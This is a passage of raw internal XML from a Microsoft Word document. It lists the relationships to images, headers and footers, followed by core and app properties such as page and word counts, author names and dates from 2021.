Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer20.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpg"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.jpg"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.jpg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer22.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpg"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.jpg"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.jpg"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image463.jpg"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.jpg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpg"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.jpg"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer23.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer17.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpg"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header21.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpg"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.jpg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.jpg"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.jpg"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpg"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.jpg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpg"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.jpg"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header24.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer21.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image394.jpg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.jpg"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image515.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpg"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.jpg"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.jpg"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer24.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image399.jpg"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image562.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.jpg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpg"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpg"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpg"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.jpg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.jpeg"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpg"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpg"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.jpg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpg"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image510.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jpg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpg"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpg"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.jpg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpg"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.jpg"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jp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83</Pages>
  <Words>2454</Words>
  <Characters>13989</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>116</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16411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Karat McFall</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>James Honeycutt</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-01T01:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-01T01:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>